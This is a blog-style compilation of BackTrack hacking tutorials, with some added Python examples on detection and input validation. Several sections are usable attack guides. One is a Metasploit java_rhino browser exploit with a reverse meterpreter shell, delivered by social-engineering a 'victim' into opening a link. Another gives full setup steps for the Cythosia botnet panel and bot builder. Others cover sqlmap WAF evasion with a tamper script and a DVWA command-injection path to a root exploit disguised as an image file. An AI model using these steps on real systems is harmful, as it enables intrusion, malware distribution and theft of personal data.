Showing posts with label tutorials.

Banner Grabbing - Backtrack


 Banner Grabbing - OS Detection 


OS Fingerprinting

After we know that the target machine is live, we can find out which operating system it runs. This technique is commonly known as Operating System (OS) fingerprinting. So today I will show you how to find out which operating system your target is using.



XPROBE 2

xprobe2 is an OS fingerprinting tool. It fingerprints operating systems using fuzzy signature matching, probabilistic guesses, multiple simultaneous matches and a signature database. You need to run xprobe2 with root privileges, because it uses a raw socket to send its probes. To access xprobe2:



1. root@root# xprobe2

// Run it in your console with no arguments and it prints the xprobe2 usage on your shell; the usage banner also shows which version you are running (BackTrack 5 R1 ships xprobe2).


Currently, xprobe2 has the following modules:

• icmp_ping: ICMP echo discovery module
• tcp_ping: TCP-based ping discovery module
• udp_ping: UDP-based ping discovery module
• ttl_calc: TCP and UDP based TTL distance calculation
• portscan: TCP and UDP PortScanner
• icmp_echo: ICMP echo request fingerprinting module
• icmp_tstamp: ICMP timestamp request fingerprinting module
• icmp_amask: ICMP address mask request fingerprinting module
• icmp_port_unreach: ICMP port unreachable fingerprinting module
• tcp_hshake: TCP Handshake fingerprinting module
• tcp_rst: TCP RST fingerprinting module
• smb: SMB fingerprinting module
• snmp: SNMPv2c fingerprinting module

For fingerprinting a remote machine, you can just call xprobe2 and give the remote machine IP address or hostname as the argument:


2. root@root# xprobe2 192.168.1.4 



Backtrack java rhino exploit

Browser Java Rhino exploit Tutorial


We are going to pwn Windows 7 with a Java exploit called the Java Rhino exploit. Here I quote the Armitage console's description of the exploit: "This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary code outside of the sandbox." The vulnerability affects version 7 and earlier versions, and should work on any browser: Firefox, Safari, Internet Explorer, Google Chrome, etc.
First of all, you have to update Metasploit from SVN with the command #msfupdate, to make sure that the above exploit is included in your BackTrack exploit database. Then run:

#msfconsole

Then use this exploit:


#use exploit/multi/browser/java_rhino


Next set payload:


#set payload java/meterpreter/reverse_tcp





At this level, type these commands, the first one is meant to set up the server:


#set srvhost 192.168.1.6

In this case, 192.168.1.6 is my internal IP; you have to change this value to your own IP. If you don't know how to get your IP address, just open a terminal and type #ifconfig. The next command defines the port of the server, which is usually port 80.


#set srvport 80

The next command sets the URI path of the exploit:


#set uripath java_rhino

#set lhost 192.168.1.6


#set lport 443





Notice also that srvhost and lhost have the same IP address. Finally, type this command and wait for a connection:



#exploit







A link has been generated: Local IP://192.168.1.6:80/java_rhino. You have to copy the link and send it to your victim. Once you succeed in "social engineering" the victim into opening the link, the sending stage starts and you'll get a Java meterpreter session.






A meterpreter session will be created.
That's it, Windows 7 is pwned =)


Setup cythosia Bot

Tutorial to install cythosia Bot



Requirements:
- Cythosia bot,
- A web host on http://www.000webhost.com/ or any other web host, but this one is free.


First Step:
Log into your web host account (or register first) and get into your web host. The website takes you to a page with a "List of your domains".
Click on "Go to cPanel" for the domain you've just made.


Second Step:
Scroll down the new page that opens and click "File Manager" in the "Files" section.
Note: if the site asks for a login, enter the password of your account.
On the new page that opens, open the folder called "public_html".
There, click the upload button.
You'll be redirected to a page that shows:
Files
Files entered here will be transferred to the FTP server.
And
Archives (zip, tar, tgz, gz)
Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.
- Under the Archives section, click "Choose File" and choose the webPanel zip archive that appeared after you extracted the downloaded one. After that, click the check mark above "Upload to directory" and wait a few seconds.


Third Step:
Return back to the first page of the File manager.
Now, to configure the files you've just uploaded so the bot can work, enter the webpanel folder on your web host, select all the files in it and click Chmod. You get redirected to "Chmod directories and files"; there, change the chmod value of the files to 777 and click the check mark button.


Fourth Step:
Now you can exit the window you are in and return to the members area ("Cpanel"). There, scroll down until you see "» Software / Services"; inside that section, click the one named "MySQL".
Create a new database with the username, database name and password you want, but keep them in your mind or save them somewhere.


Fifth Step:
Return to the cPanel and click "phpMyAdmin" in the same section as the MySQL one. Press "Enter phpMyAdmin" for the database you've just created. A new window will open; in it, click Import. The file to choose is the one named dump, located in the Webpanel folder that you extracted at the beginning; select it and press "GO". After that, you can close that window.


Sixth Step:
Get back to the cPanel and open the File Manager again. Navigate to:
/public_html/Botnet/Webpanel/admin/inc
and edit the config.php file with the details of the MySQL database, username and password you've just created.
Finally, save the file and exit the window.


Seventh Step:
Enter the domain of your web host; you'll be asked for a password. Type in "admin".


*Creating a bot:
To create your bot, open "CythBuilder" and change the "Domain" field to your domain. After that you can change "1.0.6 [beta] [23-03-2011]" to a name of your choice, and "Drop Name.exe" to the file name you want to appear.

Extract the file you just downloaded to your desktop.







RAM FORENSICS TOOLS - BACKTRACK


RAM FORENSICS TOOLS IN BACKTRACK



pdfbook.py

pdfbook.py is a utility that gathers Facebook-related information from a process dump. On a Windows system, run “pd -p [pid] > file.dump”, where [pid] is the process ID of a browser; then, on a Linux system, run “strings -el file.dump > fbookstrings” (the -el option extracts 16-bit little-endian strings, the encoding in which a Windows browser keeps much of its text in memory). Finally, run pdfbook.py on the fbookstrings file produced by the strings command.
Example Usage: pdfbook.py -f fbookstrings


pdgmail

pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump”, where [pid] is the process ID of a browser; then, on a Linux system, run “strings -el file.dump > gmailstrings”. Finally, run pdgmail.py on the gmailstrings file produced by the strings command.

Example Usage: pdgmail.py -f gmailstrings


PTK

PTK is a forensics toolkit similar to The Sleuth Kit. It contains built-in modules to analyze nearly any type of media or file type that may be encountered in a forensic investigation. It is browser based and first needs a MySQL database configured. Leave all fields at their defaults and use the password “toor” for the MySQL root user. It should set up successfully, at which point you need to register for the free version. Copy the license file you receive into the PTK config directory at /var/www/ptk/config.

Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).


Volatility

Volatility is a framework written in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type and can provide deep insight into the state of the system while it was running. It has been tested on Windows, OS X, Linux and even Cygwin. In the example below, we use Volatility to list the processes that were running on the system when the RAM image ram.img was taken.

Example Usage: volatility pslist -f ram.img
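The strings step above is what pdfbook.py and pdgmail consume. As an added example (not code from either tool or from BackTrack), the following Python reproduces the 16-bit little-endian extraction that strings -el performs and then picks Gmail addresses and Facebook c_user cookie values out of the result. The dump bytes and the artifact patterns are constructed for this illustration only.

```python
import re

# Constructed sample process dump: binary noise, an ASCII HTTP request line,
# a UTF-16LE Gmail address and a UTF-16LE Facebook cookie fragment, roughly
# as a Windows browser's memory would hold them.
SAMPLE_DUMP = (
    b"\x00\x01\x02GET /mail/ HTTP/1.1\r\n\x00\xff"
    + "user.name@gmail.com".encode("utf-16-le")
    + b"\x00\x00\x7f\x80"
    + "c_user=123456789; xs=abc".encode("utf-16-le")
    + b"\xde\xad\xbe\xef"
)

def utf16le_strings(data, min_len=4):
    """Equivalent of `strings -el`: runs of printable chars each followed by 0x00."""
    run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in run.finditer(data)]

def ascii_strings(data, min_len=4):
    """Equivalent of plain `strings`: runs of printable 8-bit characters."""
    run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in run.finditer(data)]

# Simplified artifact patterns of the kind pdgmail/pdfbook look for (constructed).
GMAIL_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@gmail\.com")
FB_USER_COOKIE = re.compile(r"\bc_user=(\d+)")

def find_artifacts(data):
    """Run both string extractors over the dump and collect matching artifacts."""
    found = {"gmail": [], "fb_user_ids": []}
    for s in utf16le_strings(data) + ascii_strings(data):
        found["gmail"].extend(GMAIL_ADDR.findall(s))
        found["fb_user_ids"].extend(FB_USER_COOKIE.findall(s))
    return found

if __name__ == "__main__":
    print(utf16le_strings(SAMPLE_DUMP))
    print(find_artifacts(SAMPLE_DUMP))
```

On a real dump, plain `strings` alone misses the UTF-16 region entirely, which is why the tutorial insists on the -el pass.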

Advance Sqlmap Commands


Advance Sqlmap tutorial







1. When you have the target URL but are not sure whether any parameter in that request is vulnerable, sqlmap can act as a scanner. The syntax for a GET request is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy"

The syntax for a POST request is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy"

This will tell you whether any of the variables (viz. id, text) is vulnerable to SQL injection. Note: throughout this tutorial we will take the POST request as the example. The only difference between the GET and POST syntax is that the POST request has an additional switch (--data) that carries your POST parameters and their values.

2. When you suspect that a particular parameter might be vulnerable to SQL injection, you can specify that parameter with the -p switch. The syntax is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id"

sqlmap will then check whether the parameter "id" is injectable.

3. If the pages described in the last scenarios (i.e. 1, 2) are only available after the user authenticates with the application, the steps are as follows:
a) Log into your application.
b) Note down all the cookie names and their values. Let us assume that the cookies generated are cookie1=dummy_val1 and cookie2=dummy_val2.
c) Use the sqlmap --cookie switch to replay these cookies along with sqlmap's requests. So the syntax will be as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4. To get details of the backend database such as its version (banner), the current database name and the database user, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5. To get the tables of the dummydb database, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"


6. To get the columns of the admin table, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"


7. When you know the backend database provider (mssql, mysql, oracle, etc.), you can specify it with the --dbms switch. This tells sqlmap not to try queries meant for other databases, which in turn can speed up the injection process.

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8. If the application is protected by a web application firewall (WAF), you can try various tamper scripts to get past its detection. There are almost 30 such tamper scripts available. To specify tamper scripts, use the --tamper switch. The syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py"

All the available tamper scripts can be found in the tamper directory inside the sqlmap root directory.


9. Writing your own tamper script. There are cases where the application has a very weak detection signature but none of the tamper scripts can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT", sqlmap will not be able to inject that target, as all of sqlmap's payloads look like "UNION ALL SELECT", "WAITFOR DELAY", etc. So let us create our own tamper script. The format of any tamper script is as follows:



# Needed imports
from lib.core.enums import PRIORITY

# Define the order in which tamper scripts are applied to the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    """ Description of your tamper script """
    retVal = payload
    # your code to tamper the original payload
    # return the tampered payload
    return retVal




Based on the above tamper script format, our script will be

#!/usr/bin/env python
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
"""
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload):
    """
    INPUT          : UNION ALL SELECT
    OUTPUT         : UNION ALL SELEcT
    TESTED AGAINST : mysql 5.x.x
    """
    retVal = payload
    if payload:
        retVal = ""
        for i in range(len(payload)):
            if payload[i:i+10] == "ALL SELECT":
                # change the case of one letter in the first match and keep
                # the rest of the payload unchanged
                retVal += "ALL SELEcT" + payload[i+10:]
                break
            else:
                retVal += payload[i]
    return retVal
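The weak signature in step 9 is a detection problem as much as a tamper problem. As an added example (not part of the original tutorial and not sqlmap code), the following Python compares a case-sensitive check on the raw parameter value with a check that normalizes the value first, run over constructed sample values for the "id" parameter including one produced by the tamper script above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values for the "id" parameter: one benign, one plain
# injection attempt, one that went through the case-changing tamper script
# above, and one URL-encoded with tabs instead of spaces.
SAMPLES = {
    "benign": "5",
    "plain": "5 UNION ALL SELECT 1,2,3--",
    "tampered": "5 UNION ALL SELEcT 1,2,3--",
    "encoded": "5%20UNION%09ALL%09SELECT%201,2,3--",
}

# The weak signature: case-sensitive, applied to the raw value.
NAIVE = re.compile(r"UNION\s+(?:ALL\s+)?SELECT")

def naive_detect(value):
    return NAIVE.search(value) is not None

def normalize(value):
    """Undo the usual evasions before matching: URL-decode until the value
    is stable, collapse any whitespace run to one space, and fold case."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    value = re.sub(r"\s+", " ", value)
    return value.casefold()

# The same signature, applied to the normalized value.
HARDENED = re.compile(r"\bunion (?:all )?select\b")

def hardened_detect(value):
    return HARDENED.search(normalize(value)) is not None

def scan(samples):
    """Map each sample name to (naive verdict, hardened verdict)."""
    return {name: (naive_detect(v), hardened_detect(v)) for name, v in samples.items()}

if __name__ == "__main__":
    for name, verdicts in scan(SAMPLES).items():
        print(name, verdicts)
```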




Advanced Web Penetration

 Web Application Hacking

In this post, I'll try to show how to gain root access through a web application. There are a lot of methods to do that; this is one of them. The web application that will be used is DVWA (Damn Vulnerable Web Application). You can download it here; the installation instructions are there too.
- Start up your Apache and MySQL.

- Open DVWA in the browser.

- Log in with username: admin and password: password.

- DVWA main page.

- The vulnerability I'll use to gain root access from this web application is its "command execution" vulnerability, because in a web application this is the most dangerous feature to have: a hacker can get a shell without having to place a backdoor on the server.
- Set the security level to medium (because 'low' would be too easy and 'hard' would be too difficult.. :P )

- Let's try a normal command.


- Next, let's execute multiple commands.


- Let's try using the pipe "|".

- Looking good. Now, let's begin the attack. >:)
- I'll use a local exploit on the system to gain root access. Before searching for the exploit, let's see which kernel version the system is running.

- Search exploit-db for a local exploit. Using the keyword "2.6.39", I found this exploit created by zx2c4, written in C.

- After downloading the exploit, let's compile it before transferring it to the target. Original exploit code here.

- Exploit ready to be used.
- Now let's try to upload it using "File Upload" in DVWA. Before doing that, I'll raise the DVWA security to the High level, because that is a rule in my training center.

- OK, let's try to upload the exploit.



- Whoops, it looks like the server only accepts image files.
- Let's try adding an image extension to the exploit. I'll rename it to exploit.jpeg.

- Upload it.

- Good. Now let's connect to the server using netcat to execute that exploit.
- Back to the "Command Execution" feature. (Don't forget to change the DVWA security back to medium.)
- Let's see whether the exploit was uploaded correctly.

- Now, start netcat on the DVWA host in listening mode.

- Look at the bottom/status bar: the browser will wait for a connection. In BackTrack's terminal, type "nc 127.0.0.1 4321".


- Then, move to the directory where the exploit is located.

- Execute it.

- Not good, the exploit didn't work properly. =,=
- Turns out that I hadn't changed the permissions to make the exploit executable. :P
- To change them, simply type "chmod 777 exploit.jpeg".

- Next, let's try to execute it again.

- It's running. But the process to spawn a root shell is taking so long. I wonder if the exploit succeeded. Have to research more.. :)
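The reason the pipe still works at the medium level is that the page only filters some separators instead of validating the input. As an added example (not DVWA's code), the following Python contrasts a filter of that kind with an allowlist: a blacklist of "&&" and ";" is assumed for the medium level, a "|" still reaches the shell, while validating the value as an IP address and passing it to ping as its own argv element leaves nothing for a shell to interpret. The sample inputs are constructed.

```python
import ipaddress

# Assumed blacklist of the kind the medium level strips before building the
# shell command (an assumption for this illustration, not DVWA's own code).
BLACKLIST = ("&&", ";")
# Characters a shell would still treat as operators after that filter.
SHELL_OPERATORS = set("|&;`$()<>\n")

def blacklist_filter(target):
    """Filter-only approach: remove the blacklisted separators, keep the rest."""
    for token in BLACKLIST:
        target = target.replace(token, "")
    return target

def filtered_command(target):
    """The shell command line a filter-only implementation would run."""
    return "ping -c 3 " + blacklist_filter(target)

def still_has_operator(cmdline):
    """Detection view: does the final command line still carry a shell operator?"""
    return any(ch in SHELL_OPERATORS for ch in cmdline)

def safe_command(target):
    """Allowlist approach: accept only a valid IP address and pass it to ping as
    a separate argv element, so no shell ever parses user input."""
    ip = ipaddress.ip_address(target.strip())   # ValueError for anything else
    return ["ping", "-c", "3", str(ip)]

def check(target):
    """Compare both approaches for one input:
    (filtered command line, operator left over?, accepted by the allowlist?)"""
    cmdline = filtered_command(target)
    try:
        safe_command(target)
        accepted = True
    except ValueError:
        accepted = False
    return cmdline, still_has_operator(cmdline), accepted

if __name__ == "__main__":
    for sample in ("127.0.0.1", "127.0.0.1; id", "127.0.0.1 | id"):
        print(repr(sample), "->", check(sample))
```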


